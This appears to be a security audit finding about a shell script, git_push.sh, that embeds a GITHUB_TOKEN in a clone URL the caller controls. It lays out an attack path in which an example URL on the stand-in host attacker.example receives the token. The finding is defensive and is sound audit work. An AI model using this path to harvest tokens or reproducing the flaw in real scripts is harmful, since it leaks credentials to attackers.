T09 · Insecure Skill Coding Practices
- Location
scripts/git_push.sh:6- Finding
GitHub Token Disclosure Through a Caller-Controlled Repository URL
- Content
View full analysis
&1 || { ``` ### Technical Analysis The repository URL is accepted as a command-line argument without validating its scheme, hostname, owner, or repository. If `GITHUB_TOKEN` is present, the script embeds it in the URL regardless of the destination host. Consequently, an attacker who can control the second argument can direct the clone operation to an attacker-controlled HTTPS server. Git will then send a request containing the token as URL user information. The token is also exposed in the `git clone` process arguments and stored in the cloned repository's `origin` URL. The script only removes the temporary clone after a successful push. Because `set -e` is active, failures after cloning can leave the repository and its credential-bearing Git configuration under `/tmp`. ### Attack Path 1. The attacker causes the script to run with a repository URL such as `https://attacker.example/repository.git`. 2. A valid `GITHUB_TOKEN` is present in the execution environment. 3. The script constructs `https://${GITHUB_TOKEN}@attacker.example/repository.git`. 4. `git clone` connects to the attacker-controlled server and transmits a request containing the credential. 5. The attacker extracts the token from server-side request data. 6. The attacker uses the token against GitHub within its granted scopes. ### Impact Assessment Succ ...[truncated 477 chars]- Remediation
View remediation
